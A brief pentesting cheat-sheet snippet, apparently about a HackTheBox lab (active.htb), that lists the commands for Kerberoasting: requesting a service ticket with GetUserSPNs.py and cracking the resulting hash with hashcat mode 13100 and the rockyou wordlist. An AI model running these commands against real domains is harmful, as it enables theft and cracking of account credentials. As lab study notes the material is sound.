GetUserSPNs.py
Check in Bloodhound, if the Administrator or other user is Kerberoastable
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgsExample
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$Hashcat
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txtLast updated